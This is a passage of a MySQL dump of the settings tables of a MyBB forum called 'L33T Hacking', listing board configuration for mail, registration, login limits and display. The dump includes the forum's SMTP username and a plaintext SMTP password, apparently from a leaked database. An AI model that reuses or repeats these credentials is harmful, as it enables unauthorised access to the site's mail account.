mybb_settinggroups VALUES('50', 'google_seo_url', 'Google SEO URL', '(Advanced Users) URL settings for the Google Search Engine Optimization plugin.', '108', '0'); INSERT INTO mybb_settinggroups VALUES('51', 'courtesyedittime', 'Courtesy Edit Time Settings', 'Settings for the courtesy edit time plugin.', '28', '0'); INSERT INTO mybb_settinggroups VALUES('52', 'hideUntilPost_settings', 'Hides Links and Attachments until Post', 'Hides Links and Attachments until Post a Post has been made on the thread.', '50', '0'); DROP TABLE IF EXISTS mybb_settings; CREATE TABLE mybb_settings ( sid smallint(5) unsigned NOT NULL auto_increment, name varchar(120) NOT NULL, title varchar(120) NOT NULL, description text NOT NULL, optionscode text NOT NULL, value text NOT NULL, disporder smallint(5) unsigned NOT NULL, gid smallint(5) unsigned NOT NULL, isdefault int(1) NOT NULL, PRIMARY KEY (sid) ); INSERT INTO mybb_settings VALUES('1', 'enablecalendar', 'Enable Calendar Functionality', 'If you wish to disable the calendar on your board, set this option to no.', 'yesno', '0', '1', '1', '1'); INSERT INTO mybb_settings VALUES('2', 'bbcodeinserter', 'Clickable MyCode Editor', 'Set this option to On to show the clickable code buttons editor on posting pages. Switching this off will also disable the Smilies Inserter.', 'onoff', '1', '1', '2', '1'); INSERT INTO mybb_settings VALUES('3', 'smilieinserter', 'Clickable Smilies Inserter', 'Clickable smilies will appear on the posting pages if this option is set to \'on\'.', 'onoff', '1', '1', '2', '1'); INSERT INTO mybb_settings VALUES('4', 'smilieinsertertot', 'No. of Smilies to show', 'Enter the total number of smilies to show on the clickable smilie inserter.', 'text', '20', '2', '2', '1'); INSERT INTO mybb_settings VALUES('5', 'smilieinsertercols', 'No. of Smilie Cols to Show', 'Enter the number of columns you wish to show on the clickable smilie inserter.', 'text', '4', '3', '2', '1'); INSERT INTO mybb_settings VALUES('6', 'cplanguage', 'Control Panel Language', 'The language of the control panel.', 'adminlanguage', 'english', '1', '3', '1'); INSERT INTO mybb_settings VALUES('7', 'cpstyle', 'Control Panel Style', 'The Default style that the control panel will use. Styles are inside the styles folder. A folder name inside that folder becomes the style title and style.css inside the style title folder is the css style file.', 'cpstyle', 'default', '2', '3', '1'); INSERT INTO mybb_settings VALUES('8', 'maxloginattempts', 'Max Number of Login Attempts', 'The max number of attempts to login before being locked out. Set to 0 to disable.', 'text', '5', '3', '3', '1'); INSERT INTO mybb_settings VALUES('9', 'loginattemptstimeout', 'Login Attempts Timeout', 'If the person trying to login reaches the max number of attempts, how long should they have to wait before being able to login again? (Set in minutes)', 'text', '15', '4', '3', '1'); INSERT INTO mybb_settings VALUES('10', 'dateformat', 'Date Format', 'The format of the dates used on the forum. This format uses the PHP date() function. We recommend not changing this unless you know what you\'re doing.', 'text', 'm-d-Y', '1', '4', '1'); INSERT INTO mybb_settings VALUES('11', 'timeformat', 'Time Format', 'The format of the times used on the forum. This format uses PHP\'s date() function. We recommend not changing this unless you know what you\'re doing.', 'text', 'h:i A', '2', '4', '1'); INSERT INTO mybb_settings VALUES('12', 'regdateformat', 'Registered Date Format', 'The format used on showthread where it shows when the user registered.', 'text', 'M Y', '3', '4', '1'); INSERT INTO mybb_settings VALUES('13', 'timezoneoffset', 'Default Timezone Offset', 'Here you can set the default timezone offset for guests and members using the default offset.', 'php\n<select name=\\\"upsetting[{$setting[\'name\']}]\\\">\n<option value=\\\"-12\\\" \".($setting[\'value\'] == -12?\"selected=\\\"selected\\\"\":\"\").\">GMT -12:00 Hours (\".my_date($mybb->settings[\'timeformat\'], TIME_NOW, -12).\")</option>\n<option value=\\\"-11\\\" \".($setting[\'value\'] == -11?\"selected=\\\"selected\\\"\":\"\").\">GMT -11:00 Hours (\".my_date($mybb->settings[\'timeformat\'], TIME_NOW, -11).\")</option>\n<option value=\\\"-10\\\" \".($setting[\'value\'] == -10?\"selected=\\\"selected\\\"\":\"\").\">GMT -10:00 Hours (\".my_date($mybb->settings[\'timeformat\'], TIME_NOW, -10).\")</option>\n<option value=\\\"-9\\\" \".($setting[\'value\'] == -9?\"selected=\\\"selected\\\"\":\"\").\">GMT -9:00 Hours (\".my_date($mybb->settings[\'timeformat\'], TIME_NOW, -9).\")</option>\n<option value=\\\"-8\\\" \".($setting[\'value\'] == -8?\"selected=\\\"selected\\\"\":\"\").\">GMT -8:00 Hours (\".my_date($mybb->settings[\'timeformat\'], TIME_NOW, -8).\")</option>\n<option value=\\\"-7\\\" \".($setting[\'value\'] == -7?\"selected=\\\"selected\\\"\":\"\").\">GMT -7:00 Hours (\".my_date($mybb->settings[\'timeformat\'], TIME_NOW, -7).\")</option>\n<option value=\\\"-6\\\" \".($setting[\'value\'] == -6?\"selected=\\\"selected\\\"\":\"\").\">GMT -6:00 Hours (\".my_date($mybb->settings[\'timeformat\'], TIME_NOW, -6).\")</option>\n<option value=\\\"-5\\\" \".($setting[\'value\'] == -5?\"selected=\\\"selected\\\"\":\"\").\">GMT -5:00 Hours (\".my_date($mybb->settings[\'timeformat\'], TIME_NOW, -5).\")</option>\n<option value=\\\"-4\\\" \".($setting[\'value\'] == -4?\"selected=\\\"selected\\\"\":\"\").\">GMT -4:00 Hours (\".my_date($mybb->settings[\'timeformat\'], TIME_NOW, -4).\")</option>\n<option value=\\\"-3.5\\\" \".($setting[\'value\'] == -3.5?\"selected=\\\"selected\\\"\":\"\").\">GMT -3:30 Hours (\".my_date($mybb->settings[\'timeformat\'], TIME_NOW, -3.5).\")</option>\n<option value=\\\"-3\\\" \".($setting[\'value\'] == -3?\"selected=\\\"selected\\\"\":\"\").\">GMT -3:00 Hours (\".my_date($mybb->settings[\'timeformat\'], TIME_NOW, -3).\")</option>\n<option value=\\\"-2\\\" \".($setting[\'value\'] == -2?\"selected=\\\"selected\\\"\":\"\").\">GMT -2:00 Hours (\".my_date($mybb->settings[\'timeformat\'], TIME_NOW, -2).\")</option>\n<option value=\\\"-1\\\" \".($setting[\'value\'] == -1?\"selected=\\\"selected\\\"\":\"\").\">GMT -1:00 Hours (\".my_date($mybb->settings[\'timeformat\'], TIME_NOW, -1).\")</option>\n<option value=\\\"0\\\" \".($setting[\'value\'] == 0?\"selected=\\\"selected\\\"\":\"\").\">GMT (\".my_date($mybb->settings[\'timeformat\'], TIME_NOW, 0).\")</option>\n<option value=\\\"+1\\\" \".($setting[\'value\'] == 1?\"selected=\\\"selected\\\"\":\"\").\">GMT +1:00 Hours (\".my_date($mybb->settings[\'timeformat\'], TIME_NOW, 1).\")</option>\n<option value=\\\"+2\\\" \".($setting[\'value\'] == 2?\"selected=\\\"selected\\\"\":\"\").\">GMT +2:00 Hours (\".my_date($mybb->settings[\'timeformat\'], TIME_NOW, 2).\")</option>\n<option value=\\\"+3\\\" \".($setting[\'value\'] == 3?\"selected=\\\"selected\\\"\":\"\").\">GMT +3:00 Hours (\".my_date($mybb->settings[\'timeformat\'], TIME_NOW, 3).\")</option>\n<option value=\\\"+3.5\\\" \".($setting[\'value\'] == 3.5?\"selected=\\\"selected\\\"\":\"\").\">GMT +3:30 Hours (\".my_date($mybb->settings[\'timeformat\'], TIME_NOW, 3.5).\")</option>\n<option value=\\\"+4\\\" \".($setting[\'value\'] == 4?\"selected=\\\"selected\\\"\":\"\").\">GMT +4:00 Hours (\".my_date($mybb->settings[\'timeformat\'], TIME_NOW, 4).\")</option>\n<option value=\\\"+4.5\\\" \".($setting[\'value\'] == 4.5?\"selected=\\\"selected\\\"\":\"\").\">GMT +4:30 Hours (\".my_date($mybb->settings[\'timeformat\'], TIME_NOW, 4.5).\")</option>\n<option value=\\\"+5\\\" \".($setting[\'value\'] == 5?\"selected=\\\"selected\\\"\":\"\").\">GMT +5:00 Hours (\".my_date($mybb->settings[\'timeformat\'], TIME_NOW, 5).\")</option>\n<option value=\\\"+5.5\\\" \".($setting[\'value\'] == 5.5?\"selected=\\\"selected\\\"\":\"\").\">GMT +5:30 Hours (\".my_date($mybb->settings[\'timeformat\'], TIME_NOW, 5.5).\")</option>\n<option value=\\\"+5.75\\\" \".($setting[\'value\'] == 5.75?\"selected=\\\"selected\\\"\":\"\").\">GMT +5:45 Hours (\".my_date($mybb->settings[\'timeformat\'], TIME_NOW, 5.75).\")</option>\n<option value=\\\"+6\\\" \".($setting[\'value\'] == 9?\"selected=\\\"selected\\\"\":\"\").\">GMT +6:00 Hours (\".my_date($mybb->settings[\'timeformat\'], TIME_NOW, 6).\")</option>\n<option value=\\\"+7\\\" \".($setting[\'value\'] == 7?\"selected=\\\"selected\\\"\":\"\").\">GMT +7:00 Hours (\".my_date($mybb->settings[\'timeformat\'], TIME_NOW, 7).\")</option>\n<option value=\\\"+8\\\" \".($setting[\'value\'] == 8?\"selected=\\\"selected\\\"\":\"\").\">GMT +8:00 Hours (\".my_date($mybb->settings[\'timeformat\'], TIME_NOW, 8).\")</option>\n<option value=\\\"+9\\\" \".($setting[\'value\'] == 9?\"selected=\\\"selected\\\"\":\"\").\">GMT +9:00 Hours (\".my_date($mybb->settings[\'timeformat\'], TIME_NOW, 9).\")</option>\n<option value=\\\"+9.5\\\" \".($setting[\'value\'] == 9.5?\"selected=\\\"selected\\\"\":\"\").\">GMT +9:30 Hours (\".my_date($mybb->settings[\'timeformat\'], TIME_NOW, 9.5).\")</option>\n<option value=\\\"+10\\\" \".($setting[\'value\'] == 10?\"selected=\\\"selected\\\"\":\"\").\">GMT +10:00 Hours (\".my_date($mybb->settings[\'timeformat\'], TIME_NOW, 10).\")</option>\n<option value=\\\"+10.5\\\" \".($setting[\'value\'] == 10.5?\"selected=\\\"selected\\\"\":\"\").\">GMT +10:30 Hours (\".my_date($mybb->settings[\'timeformat\'], TIME_NOW, 10.5).\")</option>\n<option value=\\\"+11\\\" \".($setting[\'value\'] == 11?\"selected=\\\"selected\\\"\":\"\").\">GMT +11:00 Hours (\".my_date($mybb->settings[\'timeformat\'], TIME_NOW, 11).\")</option>\n<option value=\\\"+12\\\" \".($setting[\'value\'] == 12?\"selected=\\\"selected\\\"\":\"\").\">GMT +12:00 Hours (\".my_date($mybb->settings[\'timeformat\'], TIME_NOW, 12).\")</option>\n</select>', '-4', '4', '4', '1'); INSERT INTO mybb_settings VALUES('14', 'dstcorrection', 'Day Light Savings Time', 'If times are an hour out above and your timezone is selected correctly, enable day light savings time correction.', 'yesno', '0', '5', '4', '1'); INSERT INTO mybb_settings VALUES('15', 'threadsperpage', 'Threads Per Page', 'The number of threads to display per page on the forum display', 'text', '15', '1', '5', '1'); INSERT INTO mybb_settings VALUES('16', 'hottopic', 'Replies For Hot Topic', 'The number of replies that is needed for a topic to be considered \'hot\'.', 'text', '20', '2', '5', '1'); INSERT INTO mybb_settings VALUES('17', 'hottopicviews', 'Views For Hot Topic', 'The number of views a thread can have before it is considered \'hot\'.', 'text', '150', '3', '5', '1'); INSERT INTO mybb_settings VALUES('18', 'usertppoptions', 'User Selectable Threads Per Page', 'If you would like to allow users to select how many threads per page are shown in a forum, enter the options they should be able to select separated with commas. If this is left blank they will not be able to choose how many threads are shown per page.', 'text', '10,20,25,30,40,50', '4', '5', '1'); INSERT INTO mybb_settings VALUES('19', 'dotfolders', 'Use \'dot\' Icons', 'Do you want to show dots on the thread indicators of threads users have participated in.', 'yesno', '0', '5', '5', '1'); INSERT INTO mybb_settings VALUES('20', 'allowthreadratings', 'Use Thread Ratings?', 'Allow users to rate threads?', 'yesno', '0', '6', '5', '1'); INSERT INTO mybb_settings VALUES('21', 'browsingthisforum', 'Users Browsing this Forum', 'Here you can turn off the \'users browsing this forum\' feature.', 'onoff', '0', '7', '5', '1'); INSERT INTO mybb_settings VALUES('22', 'announcementlimit', 'Announcements Limit', 'The number of forum announcements to show in the thread listing on the forum display pages. Set to 0 to disable announcements altogether.', 'text', '5', '8', '5', '1'); INSERT INTO mybb_settings VALUES('23', 'readparentforums', 'Attempt to Mark Parent Forums as Read', 'When set to yes, this setting will attempt to mark the parent forums of a sub-forum as read if there are no more unread posts. Please note that this setting can lead to a decrease in performance and multiple database queries and therefore must be treated as experimental. See the <a href=\"http://wiki.mybb.com/index.php/1.6.5\">MyBB Wiki</a> for more information regarding this change.', 'yesno', '0', '9', '5', '1'); INSERT INTO mybb_settings VALUES('24', 'showdescriptions', 'Show Forum Descriptions?', 'This option will allow you to turn off showing the descriptions for forums.', 'yesno', '1', '1', '6', '1'); INSERT INTO mybb_settings VALUES('25', 'subforumsindex', 'Subforums to show on Index listing', 'The number of subforums that you wish to show inside forums on the index and forumdisplay pages. Set to 0 to not show the subforum list', 'text', '4', '2', '6', '1'); INSERT INTO mybb_settings VALUES('26', 'subforumsstatusicons', 'Show Subforum Status Icons?', 'Show icons indicating whether or not a subforum contains new posts or not? This won\'t have any effect unless you enabled subforums display on the index.', 'yesno', '1', '3', '6', '1'); INSERT INTO mybb_settings VALUES('27', 'hideprivateforums', 'Hide Private Forums?', 'You can hide private forums by turning this option on. This option also hides forums on the forum jump and all subforums.', 'yesno', '1', '4', '6', '1'); INSERT INTO mybb_settings VALUES('28', 'modlist', 'Forums\' Moderator Listing', 'Here you can turn on or off the listing of moderators for each forum on index.php and forumdisplay.php', 'onoff', '1', '5', '6', '1'); INSERT INTO mybb_settings VALUES('29', 'showbirthdays', 'Show Today\'s Birthdays?', 'Do you want to show today\'s birthdays on the forum homepage?', 'yesno', '0', '6', '6', '1'); INSERT INTO mybb_settings VALUES('30', 'showbirthdayspostlimit', 'Only Show Birthdays with x Posts', 'You can choose to only display users with at least the following amount of posts. A setting of 0 will show all users who have a birthday today.', 'text', '0', '7', '6', '1'); INSERT INTO mybb_settings VALUES('31', 'showwol', 'Show Who\'s Online?', 'Display the currently active users on the forum home page.', 'yesno', '1', '8', '6', '1'); INSERT INTO mybb_settings VALUES('32', 'showindexstats', 'Show Small Stats Section', 'Do you want to show the total number of threads, posts, members, and the last member on the forum home?', 'yesno', '1', '9', '6', '1'); INSERT INTO mybb_settings VALUES('33', 'showforumviewing', 'Show x viewing forum', 'Displays the currently active users viewing each forum.', 'yesno', '0', '10', '6', '1'); INSERT INTO mybb_settings VALUES('34', 'bbname', 'Board Name', 'The name of your message boards. We recommend that it is not over 75 characters.', 'text', 'L33T Hacking', '1', '7', '1'); INSERT INTO mybb_settings VALUES('35', 'bburl', 'Board URL', 'The url to your forums.<br />Include the http://. Do NOT include a trailing slash.', 'text', 'http://l33thacking.net', '2', '7', '1'); INSERT INTO mybb_settings VALUES('36', 'homename', 'Homepage Name', 'The name of your homepage. This will appear in the footer with a link to it.', 'text', 'L33T Hacking', '3', '7', '1'); INSERT INTO mybb_settings VALUES('37', 'homeurl', 'Homepage URL', 'The full URL of your homepage. This will be linked to in the footer along with its name.', 'text', 'http://l33thacking.net', '4', '7', '1'); INSERT INTO mybb_settings VALUES('38', 'adminemail', 'Admin Email', 'The administrator\'s email address. This will be used for outgoing emails sent via the forums.', 'text', 'support@l33thacking.net', '5', '7', '1'); INSERT INTO mybb_settings VALUES('39', 'returnemail', 'Return Email', 'The email address for incoming replies to outgoing emails sent via the forums and is useful for no-reply accounts. Leave blank to use the admin email address instead.', 'text', '', '6', '7', '1'); INSERT INTO mybb_settings VALUES('40', 'contactlink', 'Contact Us Link', 'This will be used for the Contact Us link on the bottom of all the forum pages. Can either be an email address (using mailto:email@website.com) or a hyperlink.', 'text', 'contact.php', '7', '7', '1'); INSERT INTO mybb_settings VALUES('41', 'bblanguage', 'Default Language', 'The default language that MyBB should use for guests and for users without a selected language in their user control panel.', 'language', 'english', '8', '7', '1'); INSERT INTO mybb_settings VALUES('42', 'cookiedomain', 'Cookie Domain', 'The domain which cookies should be set to. This can remain blank. It should also start with a . so it covers all subdomains.', 'text', '.l33thacking.net', '9', '7', '1'); INSERT INTO mybb_settings VALUES('43', 'cookiepath', 'Cookie Path', 'The path which cookies are set to. We recommend setting this to the full directory path to your forums with a trailing slash.', 'text', '/', '10', '7', '1'); INSERT INTO mybb_settings VALUES('44', 'cookieprefix', 'Cookie Prefix', 'A prefix to append to all cookies set by MyBB. This is useful if you wish to install multiple copies of MyBB on the one domain or have other software installed which conflicts with the names of the cookies in MyBB. If not specified, no prefix will be used.', 'text', '', '10', '7', '1'); INSERT INTO mybb_settings VALUES('45', 'showvernum', 'Show Version Numbers', 'Allows you to turn off the public display of version numbers in MyBB.', 'onoff', '0', '11', '7', '1'); INSERT INTO mybb_settings VALUES('46', 'captchaimage', 'CAPTCHA Images for Registration & Posting', 'To help prevent automated registrations and postings, you can choose a type of image verification for the user to complete. Please see the MyBB Wiki for more information on CAPTCHAs.', 'select\n0=No CAPTCHA\n1=MyBB Default CAPTCHA\n2=reCAPTCHA', '1', '12', '7', '1'); INSERT INTO mybb_settings VALUES('47', 'captchapublickey', 'reCAPTCHA Public Key', 'Your reCAPTCHA public key.', 'text', '', '14', '7', '1'); INSERT INTO mybb_settings VALUES('48', 'captchaprivatekey', 'reCAPTCHA Private Key', 'Your reCAPTCHA private key.', 'text', '', '15', '7', '1'); INSERT INTO mybb_settings VALUES('49', 'reportmethod', 'Reported Posts Medium', 'Please select from the list how you want reported posts to be dealt with. Storing them in the database is probably the better of the options listed.', 'radio\ndb=Stored in the Database\npms=Sent as Private Messages\nemail=Sent via Email', 'db', '16', '7', '1'); INSERT INTO mybb_settings VALUES('50', 'statslimit', 'Stats Limit', 'The number of threads to show on the stats page for most replies and most views.', 'text', '15', '17', '7', '1'); INSERT INTO mybb_settings VALUES('51', 'decpoint', 'Decimal Point', 'The decimal point you use in your region.', 'text', '.', '18', '7', '1'); INSERT INTO mybb_settings VALUES('52', 'thousandssep', 'Thousands Numeric Separator', 'The punctuation you want to use. For example, a setting of \',\' with the number 1200 will give you 1,200.', 'text', ',', '19', '7', '1'); INSERT INTO mybb_settings VALUES('53', 'showlanguageselect', 'Show Language Selector in Footer', 'Set to no if you do not want to show the language selection area in the footer of all pages in the board.', 'yesno', '1', '20', '7', '1'); INSERT INTO mybb_settings VALUES('54', 'maxmultipagelinks', 'Maximum Page Links in Pagination', 'Here you can set the number of next and previous page links to show in the pagination for threads or forums with more than one page of results.', 'text', '10', '21', '7', '1'); INSERT INTO mybb_settings VALUES('55', 'mailingaddress', 'Mailing Address', 'If you have a mailing address, enter it here. This is shown on the COPPA compliance form.', 'textarea', 'support@l33thacking.net', '22', '7', '1'); INSERT INTO mybb_settings VALUES('56', 'faxno', 'Contact Fax No', 'If you have a fax number, enter it here. This is shown on the COPPA compliance form.', 'text', '', '23', '7', '1'); INSERT INTO mybb_settings VALUES('57', 'no_plugins', 'Disable All Plugins', 'Setting this to yes will disable all plugins without deactivating or uninstalling them. This is equivalent of manually defining NO_PLUGINS at the top of init.php.', 'yesno', '0', '24', '7', '1'); INSERT INTO mybb_settings VALUES('58', 'username_method', 'Allowed Login Methods', 'The login methods you wish to allow for the username field. Username only, Email only, or allow both.', 'select\n0=Username Only\n1=Email Only\n2=Both Username and Email', '0', '25', '7', '1'); INSERT INTO mybb_settings VALUES('59', 'mail_handler', 'Mail handler', 'The medium through which MyBB will send outgoing emails.', 'select\nmail=PHP mail\nsmtp=SMTP mail', 'smtp', '1', '8', '1'); INSERT INTO mybb_settings VALUES('60', 'smtp_host', 'SMTP hostname', 'The hostname of the SMTP server through which mail should be sent.<br />Only required if SMTP Mail is selected as the Mail Handler.', 'text', 'mail.l33thacking.net', '2', '8', '1'); INSERT INTO mybb_settings VALUES('61', 'smtp_port', 'SMTP port', 'The port number of the SMTP server through which mail should be sent.<br />Only required if SMTP Mail is selected as the Mail Handler.', 'text', '587', '3', '8', '1'); INSERT INTO mybb_settings VALUES('62', 'smtp_user', 'SMTP username', 'The username used to authenticate with the SMTP server.<br />Only required if SMTP Mail is selected as the Mail Handler, and the SMTP server requires authentication.', 'text', 'staff+l33thacking.net', '4', '8', '1'); INSERT INTO mybb_settings VALUES('63', 'smtp_pass', 'SMTP password', 'The corresponding password used to authenticate with the SMTP server.<br />Only required if SMTP Mail is selected as the Mail Handler, and the SMTP server requires authentication.', 'passwordbox', 'flushing718', '5', '8', '1'); INSERT INTO mybb_settings VALUES('64', 'secure_smtp', 'SMTP Encryption Mode', 'Select the encryption required to communicate with the SMTP server.<br />Only required if SMTP Mail is selected as the Mail Handler.', 'select\n0=No encryption\n1=SSL encryption\n2=TLS encryption', '0', '6', '8', '1'); INSERT INTO mybb_settings VALUES('65', 'mail_parameters', 'Additional Parameters for PHP\'s mail()', 'This setting allows you to set additional parameters for the PHP mail() function. Only used when \'PHP mail\' is selected as Mail Handler. <a href=\"http://php.net/function.mail\" target=\"_blank\">More information</a>', 'text', '', '7', '8', '1'); INSERT INTO mybb_settings VALUES('66', 'mail_logging', 'Mail Logging', 'This setting allows you to set how to log outgoing emails sent via the \'Send Thread to a Friend\' feature. In some countries it is illegal to log all content.', 'select\n0=Disable email logging\n1=Log emails without content\n2=Log everything', '2', '8', '8', '1'); INSERT INTO mybb_settings VALUES('67', 'mail_message_id', 'Add message ID in mail headers', 'Disabling this option on some shared hosts resolves issues with forum emails being marked as spam.', 'yesno', '0', '9', '8', '1'); INSERT INTO mybb_settings VALUES('68', 'disableregs', 'Disable Registrations', 'Allows you to turn off the capability for users to register with one click.', 'yesno', '0', '1', '9', '1'); INSERT INTO mybb_settings VALUES('69', 'regtype', 'Registration Method', 'Please select the method of registration to use when users register.', 'select\ninstant=Instant Activation\nverify=Send Email Verification\nrandompass=Send Random Password\nadmin=Administrator Activation', 'verify', '2', '9', '1'); INSERT INTO mybb_settings VALUES('70', 'minnamelength', 'Minimum Username Length', 'The minimum number of characters a username can be when a user registers.', 'text', '3', '3', '9', '1'); INSERT INTO mybb_settings VALUES('71', 'maxnamelength', 'Maximum Username Length', 'The maximum number of characters a username can be when a user registers.', 'text', '20', '4', '9', '1'); INSERT INTO mybb_settings VALUES('72', 'minpasswordlength', 'Minimum Password Length', 'The minimum number of characters a password should contain.', 'text', '4', '5', '9', '1'); INSERT INTO mybb_settings VALUES('73', 'requirecomplexpasswords', 'Require a complex password?', 'Do you want users to use complex passwords? Complex passwords require an upper case letter, lower case letter and a number.', 'yesno', '0', '6', '9', '1'); INSERT INTO mybb_settings VALUES('74', 'maxpasswordlength', 'Maximum Password Length', 'The maximum number of characters a password should contain.', 'text', '30', '7', '9', '1'); INSERT INTO mybb_settings VALUES('75', 'customtitlemaxlength', 'Custom User Title Maximum Length', 'Maximum length a user can enter for the custom user title.', 'text', '40', '8', '9', '1'); INSERT INTO mybb_settings VALUES('76', 'betweenregstime', 'Time Between Registrations', 'The amount of time (in hours) to disallow registrations for users who have already registered an account under the same ip address.', 'text', '24', '9', '9', '1'); INSERT INTO mybb_settings VALUES('77', 'allowmultipleemails', 'Allow emails to be registered multiple times?', 'Select yes if you wish to allow users to sign up with the same email more than once otherwise select no.', 'yesno', '0', '10', '9', '1'); INSERT INTO mybb_settings VALUES('78', 'maxregsbetweentime', 'Maximum Registrations Per IP Address', 'This option allows you to set the maximum amount of times a certain user can register within the timeframe specified above.', 'text', '2', '11', '9', '1'); INSERT INTO mybb_settings VALUES('79', 'failedcaptchalogincount', 'Number of failed logins before verification required', 'The number of times to allow someone to attempt to login before required to enter a CAPTCHA verification. 0 to disable', 'text', '2', '12', '9', '1'); INSERT INTO mybb_settings VALUES('80', 'failedlogincount', 'Number of times to allow failed logins', 'The number of times to allow someone to attempt to login. 0 to disable', 'text', '6', '13', '9', '1'); INSERT INTO mybb_settings VALUES('81', 'failedlogintime', 'Time between failed logins', 'The amount of time (in minutes) before someone can try to login again, after they have failed to login the first time. Used if value above is not 0.', 'text', '15', '14', '9', '1'); INSERT INTO mybb_settings VALUES('82', 'hiddencaptchaimage', 'Display a hidden CAPTCHA', 'Do you want to display a hidden CAPTCHA field when a user registers? This may prevent spambots from registering on your forum.', 'yesno', '1', '15', '9', '1'); INSERT INTO mybb_settings VALUES('83', 'hiddencaptchaimagefield', 'Hidden CAPTCHA field', 'You can choose a name for your hidden CAPTCHA field below.', 'text', 'email3', '16', '9', '1'); INSERT INTO mybb_settings VALUES('84', 'failedlogintext', 'Display number of failed logins', 'Do you wish to display a line of text telling the user how many more login attempts they have?', 'yesno', '1', '17', '9', '1'); INSERT INTO mybb_settings VALUES('85', 'usereferrals', 'Use Referrals System', 'Do you want to use the user referrals system on these forums?', 'yesno', '1', '18', '9', '1'); INSERT INTO mybb_settings VALUES('86', 'sigmycode', 'Allow MyCode in Signatures', 'Do you want to allow MyCode to be used in users\' signatures?', 'yesno', '1', '19', '9', '1'); INSERT INTO mybb_settings VALUES('87', 'maxsigimages', 'Maximum Number of Images per Signature', 'Enter the maximum number of images (including smilies) a user can put in their signature. Set to 0 to disable images in signatures altogether.', 'text', '1', '20', '9', '1'); INSERT INTO mybb_settings VALUES('88', 'sigsmilies', 'Allow Smilies in Signatures', 'Do you want to allow smilies to be used in users\' signatures?', 'yesno', '1', '21', '9', '1'); INSERT INTO mybb_settings VALUES('89', 'sightml', 'Allow HTML in Signatures', 'Do you want to allow HTML to be used in users\' signatures?', 'yesno', '0', '22', '9', '1'); INSERT INTO mybb_settings VALUES('90', 'sigimgcode', 'Allow [img] Code in Signatures', 'Do you want to allow [img] code to be used in users\' signatures?', 'yesno', '1', '23', '9', '1'); INSERT INTO mybb_settings VALUES('91', 'siglength', 'Length limit in Signatures', 'The maximum number of characters a user can place in a signature.', 'text', '255', '24', '9', '1'); INSERT INTO mybb_settings VALUES('92', 'sigcountmycode', 'MyCode affects signature length', 'Do you want MyCode to be counted as part of the limit when users use MyCode in their signature?', 'yesno', '1', '25', '9', '1'); INSERT INTO mybb_settings VALUES('93', 'maxavatardims', 'Maximum Avatar Dimensions', 'The maximum dimensions that an avatar can be, in the format of width<b>x</b>height. If this is left blank then there will be no dimension restriction.', 'text', '120x150', '26', '9', '1'); INSERT INTO mybb_settings VALUES('94', 'avatarsize', 'Max Uploaded Avatar Size', 'Maximum file size (in kilobytes) of uploaded avatars.', 'text', '80', '27', '9', '1'); INSERT INTO mybb_settings VALUES('95', 'avatarresizing', 'Avatar Resizing Mode', 'If you wish to automatically resize all large avatars, provide users the option of resizing their avatar, or not resize avatars at all you can change this setting.', 'select\nauto=Automatically resize large avatars\nuser=Give users the choice of resizing large avatars\ndisabled=Disable this feature', 'user', '28', '9', '1'); INSERT INTO mybb_settings VALUES('96', 'avatardir', 'Avatar Directory', 'The directory where your avatars are stored. These are used in the avatar list in the User CP.', 'text', 'images/avatars', '29', '9', '1'); INSERT INTO mybb_settings VALUES('97', 'avataruploadpath', 'Avatar Upload Path', 'This is the path where custom avatars will be uploaded to. This directory <b>must be chmod 777</b> (writable) for uploads to work.', 'text', './uploads/avatars', '30', '9', '1'); INSERT INTO mybb_settings VALUES('98', 'emailkeep', 'Users Keep Email', 'If a current user has an email already registered in your banned list, should they be allowed to keep it?', 'yesno', '0', '31', '9', '1'); INSERT INTO mybb_settings VALUES('99', 'coppa', 'COPPA Compliance', 'If you wish to enable <a href=\"http://www.coppa.org/comply.htm\">COPPA</a> support on your forums, please select the registration allowance below.', 'select\nenabled=Enabled\ndeny=Deny users under the age of 13\ndisabled=Disable this feature', 'deny', '32', '9', '1'); INSERT INTO mybb_settings VALUES('100', 'allowaway', 'Allow Away Statuses?', 'Should users be allowed to set their status to \'Away\' with a custom reason & return date?', 'yesno', '1', '33', '9', '1'); INSERT INTO mybb_settings VALUES('101', 'allowbuddyonly', 'Allow Buddy-Only Messaging?', 'Allow users to send private messages only to people on their buddy list?', 'yesno', '0', '34', '9', '1'); INSERT INTO mybb_settings VALUES('102', 'enablememberlist', 'Enable Member List Functionality', 'If you wish to disable the member list on your board, set this option to no.', 'yesno', '1', '1', '10', '1'); INSERT INTO mybb_settings VALUES('103', 'membersperpage', 'Members Per Page', 'The number of members to show per page on the member list.', 'text', '20', '2', '10', '1'); INSERT INTO mybb_settings VALUES('104', 'default_memberlist_sortby', 'Default Sort Field', 'Select the field that you want members to be sorted by default.', 'select\nregdate=Registration Date\npostnum=Post Count\nusername=Username\nlastvisit=Last Visit', 'regdate', '3', '10', '1'); INSERT INTO mybb_settings VALUES('105', 'default_memberlist_order', 'Default Sort Order', 'Select the order that you want members to be sorted by default.<br />Ascending: A-Z / beginning-end<br />Descending: Z-A / end-beginning', 'select\nascending=Ascending\ndescending=Descending', 'ascending', '4', '10', '1'); INSERT INTO mybb_settings VALUES('106', 'memberlistmaxavatarsize', 'Maximum Display Avatar Dimensions', 'The maximum dimensions for avatars when being displayed in the member list. If an avatar is too large, it will automatically be scaled down.', 'text', '70x70', '5', '10', '1'); INSERT INTO mybb_settings VALUES('107', 'boardclosed', 'Board Closed', 'If you need to close your forums to make some changes or perform an upgrade, this is the global switch. Viewers will not be able to view your forums, however, they will see a message with the reason you specify below. Administrators will still be able to view the forums.', 'yesno', '1', '1', '11', '1'); INSERT INTO mybb_settings VALUES('108', 'boardclosed_reason', 'Board Closed Reason', 'If your forum is closed, you can set a message here that your visitors will be able to see when they visit your forums.', 'textarea', 'Doing some updates. May take some hours. Stay updated by following us at twitter ( https://twitter.com/l33thackingnet ) - Jok3r', '2', '11', '1'); INSERT INTO mybb_settings VALUES('109', 'portal_announcementsfid', 'Forum ID to pull announcements from', 'Please enter the forum ids (fid) of the forum(s) you wish to pull the announcements from. Separate them with a comma (,).', 'text', '0', '1', '12', '1'); INSERT INTO mybb_settings VALUES('110', 'portal_numannouncements', 'Number of announcements to show', 'Please enter the number of announcements to show on the main page.', 'text', '0', '2', '12', '1'); INSERT INTO mybb_settings VALUES('111', 'portal_showwelcome', 'Show the Welcome box', 'Do you want to show the welcome box to visitors / users.', 'yesno', '0', '3', '12', '1'); INSERT INTO mybb_settings VALUES('112', 'portal_showpms', 'Show the number of PMs to users', 'Do you want to show the number of private messages the current user has in their pm system.', 'yesno', '0', '4', '12', '1'); INSERT INTO mybb_settings VALUES('113', 'portal_showstats', 